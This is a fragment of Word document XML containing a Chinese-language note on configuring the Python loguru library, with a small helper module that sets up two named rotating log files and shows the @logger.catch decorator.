    <w:p w14:paraId="3B7FC04D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0115BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57AB4C8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A477BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="531" w:name="_Toc159779968"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>loguru</w:t>
      </w:r>
      <w:bookmarkEnd w:id="531"/>
    </w:p>
    <w:p w14:paraId="7D92888A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798D1223" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="532" w:name="_Toc159779969"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的改进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:loguru_log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="532"/>
    </w:p>
    <w:p w14:paraId="33FDBA3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>from loguru_log import log_data, log_debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE4A78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>log_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常记录数据部分，</w:t>
      </w:r>
      <w:r>
        <w:t>log_debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常记录程序流程部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB99B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A3C257" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>log_data.info(self.path+"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>匹配到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> maven-metadata.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39634F6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>log_data.error("try self.parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>匹配失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>" + self.path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB2845" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果要进行函数调试报错的话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2574BBD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>@log_data.catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:br/>
        <w:t>def parse(self, http_content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5688EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CF24C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体源代码通常位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loguru_log.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C2500B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># coding=utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E856B7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F79B523" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>from loguru import logger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26DD00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF9284E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D8C3A55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>logger.add('./log/log_debug.log', filter=lambda record: record["extra"]["name"] == "log_debug", rotation="10 MB", retention='10 days', level="ERROR", backtrace=True, diagnose=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A6D4C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263DA08C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>logger.add('./log/log_data.log', filter=lambda record: record["extra"]["name"] == "log_data", rotation="10 MB", retention='10 days', level="ERROR", backtrace=True, diagnose=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544F4ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6174E84F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>log_debug = logger.bind(name="log_debug")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D011216" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>log_data = logger.bind(name="log_data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1FCBB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D69FF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>在其他文件中的用法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2BB71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9D9E31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA83DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>from loguru import logger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15316265" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>from loguru_log import log_debug, log_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22987D82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F139C46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>log_debug.warning("This is a new log")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5EFE2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D49C888" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>log_data.debug("this is a debug log")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729EEE7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562FE629" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069D87F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6474E23E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>logger.add('test_log.log', filter=lambda record: record["extra"]["name"] == "service_log", rotation="500 MB", retention='10 days', level="DEBUG", backtrace=True, diagnose=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73185F7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0913CE4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>logger_a = logger.bind(name="service_log")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE0091" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC89509" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>logger_a.info("Message A")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A7CB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F81D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2004538C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>一般用法，在函数上面写装饰器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>@logger.catch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105D7CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3834F1A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># @logger.catch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622731CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># @log_debug.catch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ADECF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>可以将该装饰器放在函数上方等，如果该语句段出现异常，会直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>中打印出异常的调试信息，但是不会直接打印在文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F68D715" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24103D89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># @logger.catch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1582D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># def my_function(x, y, z):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4861CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#     # An error? It's caught anyway!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC88BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#     return 1 / (x + y + z)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78763B8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD7BDAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># my_function(0, 0, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194A93B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2D215C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3165BA0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.debug('this is a debug message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269ECF9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.info('this is another debug message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F02BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.warning('this is another debug message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A68E48D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.error('this is another debug message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514D189" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.success('this is success message!')</w:t>
      </w:r>
    </w:p>
